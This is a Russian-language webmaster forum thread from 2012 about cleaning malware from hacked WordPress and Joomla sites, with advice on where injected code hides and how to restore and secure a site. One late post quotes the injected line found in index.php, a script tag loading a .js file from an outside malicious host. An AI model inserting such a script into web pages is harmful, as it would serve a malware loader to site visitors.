dreker, ошибаетесь.
Помогите - на сайте вирус, его вижу, как удалить понятия не имею???
(Ответов: 23, Просмотров: 5607)
- 29.11.2012 01:02Студент
- Регистрация: 06.07.2012
- Сообщений: 50
- Репутация: 52
- 0
- 29.11.2012 01:05Биржа комментариев
- Регистрация: 02.03.2011
- Сообщений: 388
- Репутация: 45
dreker, ошибаетесь, обычно в теме во всех файлах с расширением php вначале файла, также вирус часто бывает в файле htaccess, также стоит поискать в файле functions.php, если будете искать на совпадение, то у вас врятли что-то получится, так как используется кодирование или упаковка в случае с js
- 0
- 29.11.2012 03:15Студент
- Регистрация: 02.11.2011
- Сообщений: 54
- Репутация: 13
у меня тоже самое недавно было. Обязательно смени пароли на хосте и не храни пасы в filezilla и т.п.
У меня эта ссылка была добавлена на все сайты только в индексную страницу (index.php или .html) около тега body. на wp, также смотри index.php в конце кода. На всякий случай, отсортируй файлы по дате изменения и посмотри код. И со своего компа удали касперским и drweb-ом всю нечисть.- 0
- 29.11.2012 19:08
Мне для Joomla помог скрипт replace.php. 2 минуты и вирусов нет :) Причем все php файлы были заражены. Написано, для WP тоже подойдет.
- 0
- 30.11.2012 00:04Опытный
- Регистрация: 13.11.2012
- Сообщений: 496
- Репутация: 160
Пришел к решению, восстанавливать. Перебираю бэкапы. Жалко проделанной работы, но думаю так будет надежней
- 0
- 30.11.2012 00:10Биржа комментариев
- Регистрация: 02.03.2011
- Сообщений: 388
- Репутация: 45
Вирусы для cms сейчас становятся все более изощренными, раньше попадались редко, сейчас на каждом шагу
- 0
- 30.11.2012 03:38Студент
- Регистрация: 02.11.2011
- Сообщений: 54
- Репутация: 13
Вообще ощущение после взлома - как будто по карманам полазили - очень не приятно
- 0
30.11.2012 03:39
Сообщение от zxgame 
А чего париться-то? Скачиваете папку uploads с хостинга и установленную тему. Удаляете все файлы из доменной папки. Чистите тему от зловреда. Заливаете последнюю официальную версию движка на хостинг, подключаете БД, заливаете на хостинг папку uploads и тему. И всё. Сообщение от zxgame - 0
- 30.11.2012 04:03анальный вандализм, надежней не будет, дыра останется Сообщение от zxgame
я же выше помощь предлагал по удалению, безвозмездно!
за доп плату рассказал/показал(через TeamViewer), по желанию могу хоть урок по анализу логов и выявлению гадости предоставить
- 0
- 05.01.2013 14:48Дипломник
- Регистрация: 06.12.2009
- Сообщений: 241
- Репутация: 101
Тоже подцепил эту заразу на 4-х сайтах, движок вордпресс.
Вот что было в файле index.php
<script src="http://kinoshkaxa.changeip.name/rsize.js"></script>
Удалил, касперский перестал ругаться.
Поменял пассы на фтп, админке вп, и хостинга hqhost.
Что-то слышал про дыру в опере, но не уверен что это наш случай.- 0
Тэги топика:
Похожие темы
| Темы | Раздел | Ответов | Последний пост |
|---|---|---|---|
Вирус на сайте. | WordPress | 2 | 07.04.2012 20:23 |
Как удалить вирус с сайта?? | Прочее | 17 | 14.02.2012 05:37 |
Помогите пожалуйста найти и удалить вредоносный код на сайте | Web программирование | 5 | 30.10.2011 04:03 |
Помогите пожалуйста найти и удалить вредоносный код на сайте | Вопросы от новичков | 1 | 26.09.2011 11:19 |
Ребят помогите. Вирус на сайте | Прочее | 0 | 06.02.2011 04:36 |
addurl adsense cpa html proxy radikal wordpress yandex yandex.ru youtube zennoposter аккаунт баннер блог быть вконтакт год гугл деть добавить думать есть кейс ключ конечный контент магазин место может накрутка нужный отзыв оффера парсер партнёрка партнёрская программа первый программа продажа продвижение прокси просто работа работать регистрация рубль сайт сделать сервис скрипт сообщение софт ссылка стать страница трафик хороший хостинг цена яндекс
Тем:
77,580Сообщений:
762,966Пользователей:
30,080Сейчас на сайте:
0 пользователей и 76 гостей
